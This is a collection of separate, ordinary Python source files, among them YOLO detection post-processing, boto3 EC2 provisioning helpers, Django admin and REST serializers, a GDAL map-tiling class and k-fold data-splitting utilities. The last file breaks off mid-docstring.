    detections = detections[detections[:, 4] * detections[:, 6] >= conf_th]
    if len(detections) == 0:
        # `np.int` was a deprecated alias for the builtin `int` and was
        # removed in NumPy 1.24 — using plain `int` keeps the same dtype.
        boxes = np.zeros((0, 4), dtype=int)
        scores = np.zeros((0,), dtype=np.float32)
        classes = np.zeros((0,), dtype=np.float32)
    else:
        # scale x, y, w, h from [0, 1] to pixel values
        old_h, old_w = img_h, img_w
        offset_h, offset_w = 0, 0
        if letter_box:
            # Undo the letterbox: recover the padded canvas size and the
            # offsets of the real image inside it (mirror of preprocess()).
            if (img_w / input_shape[1]) >= (img_h / input_shape[0]):
                old_h = int(input_shape[0] * img_w / input_shape[1])
                offset_h = (old_h - img_h) // 2
            else:
                old_w = int(input_shape[1] * img_h / input_shape[0])
                offset_w = (old_w - img_w) // 2
        detections[:, 0:4] *= np.array(
            [old_w, old_h, old_w, old_h], dtype=np.float32)
        # NMS, applied independently per class id
        nms_detections = np.zeros((0, 7), dtype=detections.dtype)
        for class_id in set(detections[:, 5]):
            idxs = np.where(detections[:, 5] == class_id)
            cls_detections = detections[idxs]
            keep = _nms_boxes(cls_detections, nms_threshold)
            nms_detections = np.concatenate(
                [nms_detections, cls_detections[keep]], axis=0)
        xx = nms_detections[:, 0].reshape(-1, 1)
        yy = nms_detections[:, 1].reshape(-1, 1)
        if letter_box:
            xx = xx - offset_w
            yy = yy - offset_h
        ww = nms_detections[:, 2].reshape(-1, 1)
        hh = nms_detections[:, 3].reshape(-1, 1)
        # (x, y, w, h) -> (x1, y1, x2, y2); +0.5 rounds on truncation below.
        boxes = np.concatenate([xx, yy, xx+ww, yy+hh], axis=1) + 0.5
        boxes = boxes.astype(int)
        scores = nms_detections[:, 4] * nms_detections[:, 6]
        classes = nms_detections[:, 5].astype(int)
    detected_objects = []
    for box, score, label in zip(boxes, scores, classes):
        detected_objects.append(BoundingBox(label, score, box[0], box[2], box[1], box[3], img_w, img_h))
    return detected_objects
|
import boto3
import pprint
pp = pprint.PrettyPrinter()
client = boto3.client('ec2')
ec2 = boto3.resource('ec2')
def get_all_vpcs():
    """Return the raw VPC descriptions for the current account/region."""
    response = client.describe_vpcs()
    return response['Vpcs']
def get_vpc_by_name(vpc_name):
    """Return the first VPC whose 'Name' tag equals *vpc_name*, else None."""
    for vpc in get_all_vpcs():
        names = [tag['Value'] for tag in vpc['Tags'] if tag['Key'] == 'Name']
        if names and names[0] == vpc_name:
            return vpc
    return None
def get_all_my_images():
    """Return descriptions of every AMI owned by this account."""
    response = client.describe_images(Owners=['self'])
    return response['Images']
def get_image_by_name(image_name):
    """Return the first owned AMI named *image_name*, or None."""
    for image in get_all_my_images():
        if image['Name'] == image_name:
            return image
    return None
def get_blockdevice_from_image(image_name):
    """Return the block-device mappings of the named AMI, or None if the
    image does not exist.

    Bug fix: EC2 ``describe_images`` returns the key
    ``'BlockDeviceMappings'`` (plural); the original singular
    ``'BlockDeviceMapping'`` always raised ``KeyError``.
    """
    image = get_image_by_name(image_name)
    if image is None:
        return None
    return image['BlockDeviceMappings']
def get_all_subnets():
    """Return the raw subnet descriptions for the current account/region."""
    response = client.describe_subnets()
    return response['Subnets']
def get_subnet_by_cidr(cidr):
    """Return the first subnet with the given CIDR block, or None."""
    for subnet in get_all_subnets():
        if subnet['CidrBlock'] == cidr:
            return subnet
    return None
def get_subnet_by_name(name):
    """Return the first subnet whose 'Name' tag equals *name*, else None."""
    for subnet in get_all_subnets():
        names = [tag['Value'] for tag in subnet['Tags'] if tag['Key'] == 'Name']
        if names and names[0] == name:
            return subnet
    return None
def get_all_security_groups():
    """Return the raw security-group descriptions for the account/region."""
    response = client.describe_security_groups()
    return response['SecurityGroups']
def get_security_groups_by_names(names):
    """Return every security group whose GroupName is in *names* (order
    follows the describe_security_groups response)."""
    matched = []
    for group in get_all_security_groups():
        if group['GroupName'] in names:
            matched.append(group)
    return matched
def make_network_interface(subnet_name, private_ip, security_groups, index=0):
    """Build a NetworkInterfaces spec dict for create_instances.

    Resolves the subnet by its 'Name' tag and the security groups by
    GroupName; the interface always requests a public IP.
    """
    subnet = get_subnet_by_name(subnet_name)
    group_ids = [
        group['GroupId']
        for group in get_security_groups_by_names(security_groups)
    ]
    spec = {
        'DeviceIndex': index,
        'SubnetId': subnet['SubnetId'],
        'PrivateIpAddress': private_ip,
        'AssociatePublicIpAddress': True,
        'Groups': group_ids,
    }
    return spec
def create_instance(instance_type, image_name, key_name, network_interface):
    """Launch exactly one EC2 instance from the named AMI and return the
    list of created instance resources."""
    image = get_image_by_name(image_name)
    return ec2.create_instances(
        ImageId=image['ImageId'],
        MinCount=1,
        MaxCount=1,
        KeyName=key_name,
        InstanceType=instance_type,
        NetworkInterfaces=[network_interface],
    )
def create_codealley_mesos_slave(private_ip, instance_type='t2.medium'):
    """Launch a codealley Mesos slave at *private_ip* using the project's
    fixed AMI, key pair, subnet and security groups."""
    # from config
    image_name = 'mesos-slave-base-ami'
    key_name = 'codealley_aws_oregon'
    subnet_name = 'codealley-pub-subnet1'
    security_groups = ['default', 'mesos-slave-sg', 'zabbix-agent-sg', 'elk-sg']
    # end
    interface = make_network_interface(subnet_name, private_ip, security_groups)
    return create_instance(instance_type, image_name, key_name, interface)
def get_instance_status(instance_id):
    """Return the status entries reported for *instance_id*."""
    response = client.describe_instance_status(InstanceIds=[instance_id])
    return response['InstanceStatuses']
def delete_instance(instance_id):
    """Terminate *instance_id* and return the TerminatingInstances entries."""
    response = client.terminate_instances(InstanceIds=[instance_id])
    return response['TerminatingInstances']
#pp.pprint(get_vpc_by_name('codealley-vpc-oregon')['VpcId'])
#pp.pprint(get_image_by_name('mesos-slave-base-ami'))
#pp.pprint(get_subnet_by_name('codealley-pub-subnet1')['SubnetId'])
#pp.pprint(get_security_groups_by_names(['default', 'elk-sg']))
#pp.pprint(create_codealley_mesos_slave('10.1.100.25'))
#pp.pprint(delete_instance('i-0e3d51298e3be38c3'))
#pp.pprint(get_instance_status('i-0e3d51298e3be38c3'))
# block device
# DeviceNa
# create instance
# DrypRun=True
# ImageId='string'
# MinCount=1
# MaxCount=1
# KeyName='string'
# InstanceType='t2.medium'
# Placement=Placement
# PrivateIpAddress='string'
# SecurityGroupIds=['string', 'string']
# SubnetId='string'
# BlockDeviceMapping=BlockDeviceMapping |
from django.contrib import admin
from .models import *
class DoctorAdmin(admin.ModelAdmin):
    """Admin list view for Doctor: show id, full name parts and image;
    allow searching by last name."""
    list_display = ('id', 'last_name', 'name', 'middle_name', 'image')
    search_fields = ('last_name',)
class TitleAdmin(admin.ModelAdmin):
    """Admin list view for Title: show id and title."""
    list_display = ('id', 'title')
# Register both models with their customized admin classes.
admin.site.register(Title, TitleAdmin)
admin.site.register(Doctor, DoctorAdmin)
|
# Root directory for datasets, relative to the process working directory.
data_path = "../data"
|
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from awkward._v2.operations.structure.copy import copy # noqa: F401
from awkward._v2.operations.structure.mask import mask # noqa: F401
from awkward._v2.operations.structure.num import num # noqa: F401
from awkward._v2.operations.structure.run_lengths import run_lengths # noqa: F401
from awkward._v2.operations.structure.zip import zip # noqa: F401
from awkward._v2.operations.structure.unzip import unzip # noqa: F401
from awkward._v2.operations.structure.to_regular import to_regular # noqa: F401
from awkward._v2.operations.structure.from_regular import from_regular # noqa: F401
from awkward._v2.operations.structure.with_name import with_name # noqa: F401
from awkward._v2.operations.structure.with_field import with_field # noqa: F401
from awkward._v2.operations.structure.with_parameter import with_parameter # noqa: F401
from awkward._v2.operations.structure.without_parameters import ( # noqa: F401
without_parameters,
)
from awkward._v2.operations.structure.zeros_like import zeros_like # noqa: F401
from awkward._v2.operations.structure.ones_like import ones_like # noqa: F401
from awkward._v2.operations.structure.full_like import full_like # noqa: F401
from awkward._v2.operations.structure.broadcast_arrays import ( # noqa: F401
broadcast_arrays,
)
from awkward._v2.operations.structure.concatenate import concatenate # noqa: F401
from awkward._v2.operations.structure.where import where # noqa: F401
from awkward._v2.operations.structure.flatten import flatten # noqa: F401
from awkward._v2.operations.structure.unflatten import unflatten # noqa: F401
from awkward._v2.operations.structure.ravel import ravel # noqa: F401
from awkward._v2.operations.structure.packed import packed # noqa: F401
from awkward._v2.operations.structure.local_index import local_index # noqa: F401
from awkward._v2.operations.structure.sort import sort # noqa: F401
from awkward._v2.operations.structure.argsort import argsort # noqa: F401
from awkward._v2.operations.structure.pad_none import pad_none # noqa: F401
from awkward._v2.operations.structure.fill_none import fill_none # noqa: F401
from awkward._v2.operations.structure.is_none import is_none # noqa: F401
from awkward._v2.operations.structure.singletons import singletons # noqa: F401
from awkward._v2.operations.structure.firsts import firsts # noqa: F401
from awkward._v2.operations.structure.cartesian import cartesian # noqa: F401
from awkward._v2.operations.structure.argcartesian import argcartesian # noqa: F401
from awkward._v2.operations.structure.combinations import combinations # noqa: F401
from awkward._v2.operations.structure.argcombinations import ( # noqa: F401
argcombinations,
)
from awkward._v2.operations.structure.nan_to_num import nan_to_num # noqa: F401
from awkward._v2.operations.structure.isclose import isclose # noqa: F401
from awkward._v2.operations.structure.values_astype import values_astype # noqa: F401
from awkward._v2.operations.structure.strings_astype import strings_astype # noqa: F401
|
from pathlib import PosixPath
import numpy
from osgeo import gdal
from osgeo import osr
from .image_output import SimpleImageOutput
from .resampler import get_resampler
from .utils import ensure_dir_exists, gdal_write
class GDAL2Tiles:
    """Cut a georeferenced raster into a pyramid of map tiles.

    The instance is configured in ``__init__`` and driven by
    :meth:`process`: open the input raster, write the base (deepest
    zoom) tiles directly from it, then build the overview levels on
    top of the tiles underneath.

    NOTE(review): several attributes/methods used below (``tminmax``,
    ``generate_base_tile_xyzzy``, ``adjust_zoom``,
    ``calculate_ranges_for_tiles``) are not defined in this class —
    presumably supplied by a subclass; confirm before using this class
    directly.
    """

    def __init__(
        self,
        source_path, output_dir,
        min_zoom=None, max_zoom=None,
        resampling_method='average',
        source_srs=None, source_nodata=None,
        tile_size=256
    ):
        # source_path: input raster; output_dir: root of the tile pyramid.
        self.source_path = PosixPath(source_path)
        self.output_dir = PosixPath(output_dir)
        # Zoom range; None means "decide later" (presumably in adjust_zoom()
        # — TODO confirm).
        self.min_zoom = min_zoom
        self.max_zoom = max_zoom
        # One of 'near', 'bilinear', 'average', 'antialias', ...;
        # validated in check_resampling_method_availability().
        self.resampling_method = resampling_method
        # Optional user-supplied SRS / nodata overrides for the source.
        self.source_srs = source_srs
        self.source_nodata = source_nodata
        # Tile format
        self.tile_size = tile_size
        # Should we read bigger window of the input raster and scale it down?
        # Note: Modified later by open_input()
        # Not for 'near' resampling
        # Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
        # Not for 'raster' profile
        self.scaledquery = True
        self.write_method = gdal_write
        # Should we use Read on the input file for generating overview tiles?
        # Note: Modified later by open_input()
        # Otherwise the overview tiles are generated from
        # existing underlying tiles
        self.overviewquery = False
        self.check_resampling_method_availability()
        self.set_querysize()

    def set_querysize(self):
        """Set the read-window size used when scaling tiles down."""
        # How big should be query window be for scaling down
        # Later on reset according the chosen resampling algorithm
        if self.resampling_method == 'near':
            self.querysize = self.tile_size
        elif self.resampling_method == 'bilinear':
            self.querysize = self.tile_size * 2
        else:
            # All remaining methods read a 4x window for better quality.
            self.querysize = 4 * self.tile_size

    def check_resampling_method_availability(self):
        """Fail fast if the chosen resampling method is not usable.

        Raises
        ------
        Exception
            When the required GDAL/numpy support is missing.
        """
        # Supported options
        if self.resampling_method == 'average':
            try:
                # Attribute probe: only newer GDAL builds expose this.
                gdal.RegenerateOverview
            except Exception:
                raise Exception(
                    "'average' resampling algorithm is not available.",
                    "Please use -r 'near' argument or upgrade to newer version of GDAL."
                )
        elif self.resampling_method == 'antialias':
            try:
                # Attribute probe: verifies the numpy import succeeded.
                numpy
            except Exception:
                raise Exception(
                    "'antialias' resampling algorithm is not available.",
                    "Install PIL (Python Imaging Library) and numpy."
                )

    # -------------------------------------------------------------------------
    def process(self):
        """Run the whole tiling pipeline, top to bottom."""
        # Opening and preprocessing of the input file
        self.open_input()
        # Generation of the lowest tiles
        self.generate_base_tiles()
        # Generation of the overview tiles (higher in the pyramid)
        self.generate_overview_tiles()

    def open_input(self):
        """Initialization of the input raster, reprojection if necessary"""
        self.initialize_input_raster()
        self.set_out_srs()
        self.out_ds = None
        self.reproject_if_necessary()
        # If no reprojection happened, tile straight from the input dataset.
        if not self.out_ds:
            self.out_ds = self.in_ds
        self.instantiate_image_output()
        self.configure_bounds()
        self.adjust_zoom()
        self.calculate_ranges_for_tiles()

    def reproject_if_necessary(self):
        # Hook: subclasses may set self.out_ds to a warped dataset here.
        pass

    def initialize_input_raster(self):
        """Open self.source_path with GDAL and validate it is tileable.

        Also derives the nodata value and the input SRS when they were
        not supplied explicitly.

        Raises
        ------
        Exception
            If the file cannot be opened, has no raster band, or is a
            paletted (color-table) dataset.
        """
        # Disable .aux.xml side-car files for this process.
        gdal.SetConfigOption("GDAL_PAM_ENABLED", "NO")
        gdal.AllRegister()
        # Open the input file
        self.in_ds = gdal.Open(str(self.source_path), gdal.GA_ReadOnly)
        if not self.in_ds:
            # Note: GDAL prints the ERROR message too
            raise Exception(
                'It is not possible to open the '
                f'input file "{self.source_path}".'
            )
        # Read metadata from the input file
        if self.in_ds.RasterCount == 0:
            raise Exception("Input file '%s' has no raster band" % self.source_path)
        if self.in_ds.GetRasterBand(1).GetRasterColorTable():
            # TODO: Process directly paletted dataset by generating VRT in memory
            raise Exception(
                "Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
                """From paletted file you can create RGBA file (temp.vrt) by:
                       gdal_translate -of vrt -expand rgba %s temp.vrt
                       then run:
                       gdal2tiles temp.vrt""" % self.source_path)
        # Get NODATA value
        # If the source dataset has NODATA, use it.
        if self.source_nodata is None:
            # First band that declares a nodata value wins.
            for i in range(1, self.in_ds.RasterCount + 1):
                ndvalue = self.in_ds.GetRasterBand(i).GetNoDataValue()
                if ndvalue is not None:
                    self.source_nodata = ndvalue
                    break
        # Here we should have RGBA input dataset opened in self.in_ds
        # Spatial Reference System of the input raster
        self.in_srs = None
        if self.source_srs:
            # Explicit user override takes precedence.
            self.in_srs = osr.SpatialReference()
            self.in_srs.SetFromUserInput(self.source_srs)
            self.in_srs_wkt = self.in_srs.ExportToWkt()
        else:
            # Fall back to the dataset projection, then to GCP projection.
            self.in_srs_wkt = self.in_ds.GetProjection()
            if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:
                self.in_srs_wkt = self.in_ds.GetGCPProjection()
            if self.in_srs_wkt:
                self.in_srs = osr.SpatialReference()
                self.in_srs.ImportFromWkt(self.in_srs_wkt)
        # Spatial Reference System of tiles
        self.out_srs = osr.SpatialReference()

    def set_out_srs(self):
        # Hook: subclasses configure self.out_srs (e.g. Web Mercator).
        pass

    def instantiate_image_output(self):
        # Instantiate image output.
        resampler = get_resampler(self.resampling_method, self.write_method)
        self.image_output = SimpleImageOutput(
            self.out_ds,
            self.tile_size,
            resampler,
            self.write_method,
            self.source_nodata,
            self.output_dir,
        )

    def configure_bounds(self):
        """Derive the output bounding box from the dataset geotransform.

        Raises
        ------
        Exception
            If the geotransform contains rotation/skew terms.
        """
        # Read the georeference
        self.out_gt = self.out_ds.GetGeoTransform()
        # Report error in case rotation/skew is in geotransform
        # (possible only in 'raster' profile)
        # TODO: move to raster.Raster, somehow...
        if (self.out_gt[2], self.out_gt[4]) != (0, 0):
            raise Exception(
                "Georeference of the raster contains rotation or skew. "
                "Such raster is not supported. Please use gdalwarp first."
            )
        # TODO: Do the warping in this case automatically
        #
        # Here we expect: pixel is square, no rotation on the raster
        #
        # Output Bounds - coordinates in the output SRS
        self.ominx = self.out_gt[0]
        self.omaxx = self.out_gt[0] + self.out_ds.RasterXSize * self.out_gt[1]
        self.omaxy = self.out_gt[3]
        # Square-pixel assumption (see above): the x pixel size out_gt[1]
        # is reused for the y extent as well.
        self.ominy = self.out_gt[3] - self.out_ds.RasterYSize * self.out_gt[1]
        # Note: maybe round(x, 14) to avoid the gdal_translate behaviour,
        # when 0 becomes -1e-15

    # -------------------------------------------------------------------------
    def generate_base_tiles(self):
        """Generation of the base tiles (the lowest in the pyramid)
        directly from the input raster"""
        # Set the bounds
        tminx, tminy, tmaxx, tmaxy = self.tminmax[self.max_zoom]
        querysize = self.querysize
        # Just the center tile
        # tminx = tminx+ (tmaxx - tminx)/2
        # tminy = tminy+ (tmaxy - tminy)/2
        # tmaxx = tminx
        # tmaxy = tminy
        tz = self.max_zoom
        tzs = str(tz)
        for tx in range(tminx, tmaxx + 1):
            # One directory per (zoom, column); remember whether it existed
            # so the writer can skip redundant work.
            target_path = self.output_dir / tzs / str(tx)
            dir_already_existed = ensure_dir_exists(target_path)
            for ty in self.get_y_range(self.max_zoom):
                # NOTE(review): generate_base_tile_xyzzy is not defined in
                # this class — expected from a subclass; confirm.
                xyzzy = self.generate_base_tile_xyzzy(
                    tx, ty, tz,
                    querysize,
                    tminx, tminy, tmaxx, tmaxy
                )
                self.image_output.write_base_tile(
                    tx, ty, tz, xyzzy, dir_already_existed
                )

    # -------------------------------------------------------------------------
    def generate_overview_tiles(self):
        """Generation of the overview tiles (higher in the pyramid)
        based on existing tiles"""
        # Usage of existing tiles:
        # from 4 underlying tiles generate one as overview.
        # querysize = tile_size * 2
        # Walk the zoom levels from just above the base down to min_zoom.
        for tz in range(self.max_zoom - 1, self.min_zoom - 1, -1):
            tminx, tminy, tmaxx, tmaxy = self.tminmax[tz]
            tzs = str(tz)
            for tx in range(tminx, tmaxx + 1):
                target_path = self.output_dir / tzs / str(tx)
                dir_already_existed = ensure_dir_exists(target_path)
                for ty in self.get_y_range(tz):
                    self.image_output.write_overview_tile(
                        tx, ty, tz, dir_already_existed
                    )

    def get_y_range(self, zoom):
        """Return the tile-row range for `zoom`, iterated top-down."""
        tminx, tminy, tmaxx, tmaxy = self.tminmax[zoom]
        return range(tmaxy, tminy - 1, -1)
|
from rest_framework import serializers
from .models import Institute, Student, Batch, Paper, Section, Question, Exam, Result, AttemptedQuestion, BaseUser
from django.contrib.auth.models import Group
class BaseUserSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing the core BaseUser account fields."""

    class Meta:
        model = BaseUser
        fields = ['url', 'username', 'email', 'groups', 'is_institute']
class StudentSerializer(serializers.ModelSerializer):
    """Serializes every field of the Student model."""

    class Meta:
        model = Student
        fields = '__all__'
class BatchSerializer(serializers.ModelSerializer):
    """Serializes every field of the Batch model."""

    class Meta:
        model = Batch
        fields = '__all__'
class PaperSerializer(serializers.ModelSerializer):
    """Serializes every field of the Paper model."""

    class Meta:
        model = Paper
        fields = '__all__'
class SectionSerializer(serializers.ModelSerializer):
    """Serializes every field of the Section model."""

    class Meta:
        model = Section
        fields = '__all__'
class QuestionSerializer(serializers.ModelSerializer):
    """Serializes every field of the Question model."""

    class Meta:
        model = Question
        fields = '__all__'
class ExamSerializer(serializers.ModelSerializer):
    """Serializes every field of the Exam model."""

    class Meta:
        model = Exam
        fields = '__all__'
class ResultSerializer(serializers.ModelSerializer):
    """Serializes every field of the Result model."""

    class Meta:
        model = Result
        fields = '__all__'
class AttemptedQuestionSerializer(serializers.ModelSerializer):
    """Serializes every field of the AttemptedQuestion model."""

    class Meta:
        model = AttemptedQuestion
        fields = '__all__'
class GroupSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for Django auth groups (url + name only)."""

    class Meta:
        model = Group
        fields = ['url', 'name']
class InstituteSerializer(serializers.ModelSerializer):
    """Serializes every field of the Institute model."""

    # student_institute = StudentSerializer(many=True, read_only=True)
    # batch_institute = BatchSerializer(many=True, read_only=True)
    class Meta:
        model = Institute
        fields = '__all__'
|
#!/usr/bin/env python3
import argparse
from .generator import Generator
def standalone():
    """CLI entry point: build the header and body input files.

    Parses the command-line options and hands them to ``Generator``,
    which performs the actual file generation.
    """
    cli = argparse.ArgumentParser(
        description="Generate header and body files for WF Dispatcher"
    )
    cli.add_argument(
        "-b", "--bodyfile", default="postbody.json", help="File for post data"
    )
    cli.add_argument(
        "-r", "--headerfile", default="authheader.txt", help="Auth header file"
    )
    cli.add_argument(
        "-m", "--mock", action="store_true", help="Make mock user, not from env"
    )
    opts = cli.parse_args()
    # Delegate the real work to the generator.
    Generator(
        bodyfile=opts.bodyfile, headerfile=opts.headerfile, _mock=opts.mock
    ).go()
# Allow running this module directly as a script.
if __name__ == "__main__":
    standalone()
|
import helper
class SHA256:
    """Thin staged wrapper around :class:`helper.Helper` for SHA-256.

    Intended usage is preprocess() -> copy_chunks() ->
    compression_function() -> digest(); every stage simply delegates to
    the underlying helper object.
    """

    def __init__(self, message):
        """Store `message` and build the delegate hasher.

        Args:
            message: the input message to be hashed.
        """
        self.hasher = helper.Helper(message)
        self.msg = message
        self.message_length = len(message)
        # FIX: previously `msg`, `chunks` and `message_length` were
        # class-level attributes shared by all instances; they are plain
        # per-instance state, so initialize them here instead.
        # `chunks` stays None until preprocess() runs.
        self.chunks = None

    def preprocess(self):
        """Pad the message and split it into chunks (delegated)."""
        self.hasher.pre_process()
        self.msg = self.hasher.binary_msg_with_padding_and_length
        self.chunks = self.hasher.chunks

    def copy_chunks(self):
        """Copy chunk bits and extend them into the message schedule."""
        self.hasher.copy_chunk_bits()
        self.hasher.extend_words()

    def compression_function(self):
        """Run the SHA-256 compression rounds (delegated)."""
        self.hasher.compress()

    def digest(self):
        """Return the final digest computed by the helper."""
        return self.hasher.digest()
# Small demo: hash a fixed message and print the digest.
if __name__ == '__main__':
    message = 'the quick brown fox jumped over the lazy dog'
    s = SHA256(message)
    s.preprocess()
    # ensure your version of python supports the statement below
    print('input message is: {} \ndigest (SHA-256) is: {}'.format(message, s.digest()))
|
# Copyright (C) 2017 Zhixian MA <zxma_sjtu@qq.com>
"""
Get samples to train CNN
Totally 21 samples, in which 17 are for training and 5 for test.
"""
import os
import argparse
import numpy as np
import scipy.io as sio
def main():
    """Collect per-class samples from every observation and save them.

    Walks the observation folders under ``inpath``, loads each
    ``sample_sm.mat``, splits rows by their label (0 = background,
    1 = cavity, 2 = extended) and writes the combined arrays to
    ``<inpath>/sample_all``.
    """
    # Command line interface
    parser = argparse.ArgumentParser(description="Get samples to train CNN")
    parser.add_argument("inpath", help="path of the folder saving samples")
    parser.add_argument("ratio", help="ratio of training samples.")
    args = parser.parse_args()
    inpath = args.inpath
    # ratio = float(args.ratio)
    # Guard clause: nothing to do without the input folder.
    if not os.path.exists(inpath):
        print("The inpath does not exist.")
        return
    # Per-class accumulators, keyed by label value.
    data_parts = {0: [], 1: [], 2: []}
    label_parts = {0: [], 1: [], 2: []}
    for s in os.listdir(inpath):
        obspath = os.path.join(inpath, s)
        # Judge existence of the path
        if not os.path.exists(obspath):
            print("The observation %s does not exist." % obspath)
            continue
        print("Processing on sample %s ..." % s)
        # Load and split this observation's samples by label.
        dataset = sio.loadmat(os.path.join(obspath, 'sample_sm.mat'))
        data = dataset['data']
        label = dataset['label']
        for cls in (0, 1, 2):
            rows = np.where(label == cls)[0]
            data_parts[cls].append(data[rows, :])
            label_parts[cls].append(label[rows, :])

    def _stacked(parts):
        # Mirrors the original behaviour: None when nothing was collected.
        return np.row_stack(parts) if parts else None

    # Save everything into one .mat file.
    sample_path = os.path.join(inpath, 'sample_all')
    print("Saving samples ...")
    sio.savemat(sample_path, {"data_bkg": _stacked(data_parts[0]),
                              "data_ext": _stacked(data_parts[2]),
                              "data_cav": _stacked(data_parts[1]),
                              "label_bkg": _stacked(label_parts[0]),
                              "label_ext": _stacked(label_parts[2]),
                              "label_cav": _stacked(label_parts[1])})
# Allow running this module directly as a script.
if __name__ == "__main__":
    main()
|
"""
Add something like this to your settings
ANALYSIS_TIME_FRAME_TASKS = {
"thermometer": {
"name": "Thermometer",
"frame_class_path": "twitter_feels.apps.thermometer.models.TimeFrame",
},
"other": {
"name": "Something Else",
"frame_class_path": "some.other.OtherTimeFrame",
"autostart": True,
},
}
"""
from django.conf import settings
# Task configuration pulled from Django settings; falls back to an empty
# dict when ANALYSIS_TIME_FRAME_TASKS is not defined (expected shape is
# documented in the module docstring above).
TIME_FRAME_TASKS = getattr(settings, 'ANALYSIS_TIME_FRAME_TASKS', {})
|
import numpy as np
from typing import Any
from typing import Dict
from typing import List
from typing import Type
from typing import Tuple
from typing import Union
from typing import Callable
from typing import Optional
from cftool.misc import register_core
from cftool.misc import shallow_copy_dict
from cftool.misc import get_unique_indices
from cftool.misc import Sampler
from cftool.misc import LoggingMixin
from abc import *
from .misc import *
from ..types import *
from .api import TabularData
class KFold:
    """
    Util class which can perform k-fold data splitting:

    1. X = {x1, x2, ..., xn} -> [X1, X2, ..., Xk]
    2. Xi ∩ Xj = ∅, ∀ i, j = 1,..., K
    3. X1 ∪ X2 ∪ ... ∪ Xk = X

    * Notice that `KFold` does not always hold the principles listed above, because `DataSplitter`
    will ensure that at least one sample of each class will be kept. In this case, when we apply
    `KFold` to an imbalance dataset, `KFold` may slightly violate principle 2. and 3.

    Parameters
    ----------
    k : int, number of folds
    dataset : TabularDataset, dataset which we want to split
    **kwargs : used to initialize `DataSplitter` instance
    """

    def __init__(self, k: int, dataset: TabularDataset, **kwargs: Any):
        if k <= 1:
            raise ValueError("k should be larger than 1 in KFold")
        # The first k-1 folds each take 1/k of the data; the final fold is
        # whatever remains (via `return_remained=True` in __iter__).
        ratio = 1.0 / k
        self.n_list = (k - 1) * [ratio]
        self.splitter = DataSplitter(**kwargs).fit(dataset)
        self._cursor: int
        self._order: np.ndarray
        self.split_results: List[SplitResult]

    def __iter__(self) -> "KFold":
        self.split_results = self.splitter.split_multiple(
            self.n_list,
            return_remained=True,
        )
        # FIX: `_order` is annotated as np.ndarray but used to be converted
        # with `.tolist()`; keep the ndarray (indexing below is unchanged,
        # and list.pop accepts the resulting numpy integer).
        self._order = np.random.permutation(len(self.split_results))
        self._cursor = 0
        return self

    def __next__(self) -> Tuple[SplitResult, SplitResult]:
        if self._cursor >= len(self._order):
            raise StopIteration
        # The fold picked by the shuffled order becomes the test fold;
        # all remaining folds are concatenated into the training set.
        train_results = self.split_results.copy()
        test_result = train_results.pop(self._order[self._cursor])
        train_result = SplitResult.concat(train_results)
        self._cursor += 1
        return train_result, test_result
class KRandom:
    """
    Util class which can perform k-random data splitting:

    1. X = {x1, x2, ..., xn} -> [X1, X2, ..., Xk]
    2. idx{X1} ≠ idx{X2} ≠ ... ≠ idx{Xk}, where idx{X} = {1, 2, ..., n}
    3. X1 = X2 = ... = Xk = X

    Every iteration re-shuffles the whole dataset, so unlike `KFold`
    the k test sets may overlap.

    Parameters
    ----------
    k : int, number of random splits to generate
    num_test : {int, float}
        * if float and < 1 : ratio of the test dataset
        * if int and > 1 : exact number of test samples
    dataset : TabularDataset, dataset which we want to split
    **kwargs : used to initialize `DataSplitter` instance
    """

    def __init__(
        self,
        k: int,
        num_test: Union[int, float],
        dataset: TabularDataset,
        **kwargs: Any,
    ):
        self._cursor: int
        self.k = k
        self.num_test = num_test
        self.splitter = DataSplitter(**kwargs).fit(dataset)

    def __iter__(self) -> "KRandom":
        # Restart from the first split.
        self._cursor = 0
        return self

    def __next__(self) -> Tuple[SplitResult, SplitResult]:
        if self._cursor >= self.k:
            raise StopIteration
        self._cursor += 1
        # Fresh shuffle for every split: reset, carve out the test
        # portion, keep the remainder for training.
        self.splitter.reset()
        split_pair = self.splitter.split_multiple(
            [self.num_test],
            return_remained=True,
        )
        test_result, train_result = split_pair
        return train_result, test_result
class KBootstrap:
    """
    Util class which can perform k-random data splitting with bootstrap:

    1. X = {x1, x2, ..., xn} -> [X1, X2, ..., Xk] (Use bootstrap aggregation to collect datasets)
    2. idx{X1} ≠ idx{X2} ≠ ... ≠ idx{Xk}, where idx{X} = {1, 2, ..., n}
    3. X1 = X2 = ... = Xk = X

    * Notice that only some of the special algorithms (e.g. bagging) need `KBootstrap`.

    Parameters
    ----------
    k : int, number of splits
    num_test : {int, float}
        * if float and < 1 : ratio of the test dataset
        * if int and > 1 : exact number of test samples
    dataset : TabularDataset, dataset which we want to split
    **kwargs : used to initialize `DataSplitter` instance
    """

    def __init__(
        self,
        k: int,
        num_test: Union[int, float],
        dataset: TabularDataset,
        **kwargs: Any,
    ):
        self._cursor: int
        self.dataset = dataset
        self.num_samples = len(dataset)
        # A fractional `num_test` is interpreted as a ratio of the dataset.
        if isinstance(num_test, float):
            num_test = int(round(num_test * self.num_samples))
        self.k = k
        self.num_test = num_test
        self.splitter = DataSplitter(**kwargs).fit(dataset)

    def __iter__(self) -> "KBootstrap":
        self._cursor = 0
        return self

    def __next__(self) -> Tuple[SplitResult, SplitResult]:
        if self._cursor >= self.k:
            raise StopIteration
        self._cursor += 1
        self.splitter.reset()
        test_result, train_result = self.splitter.split_multiple(
            [self.num_test],
            return_remained=True,
        )
        # Bootstrap step: draw len(train) indices *with replacement* from
        # the training indices and materialize that subset.
        chosen = train_result.corresponding_indices
        chosen = np.random.choice(chosen, len(chosen))
        boot_set = self.dataset.split_with(chosen)
        boot_split = SplitResult(boot_set, chosen, None)
        return boot_split, test_result
class ImbalancedSampler(LoggingMixin):
    """
    Util class which can sample imbalance dataset in a balanced way

    Parameters
    ----------
    data : TabularData, data which we want to sample from
    imbalance_threshold : float
    * for binary class cases, if n_pos / n_neg < threshold, we'll treat data as imbalance data
    * for multi class cases, if n_min_class / n_max_class < threshold, we'll treat data as imbalance data
    shuffle : bool, whether shuffle the returned indices
    aggregation : str, name of the time-series aggregation (looked up in
      `aggregation_dict`); only used when `data.is_ts`
    aggregation_config : dict, optional config for the aggregation
    sample_weights : np.ndarray, optional explicit per-sample weights;
      when given, they override the label-based balancing entirely
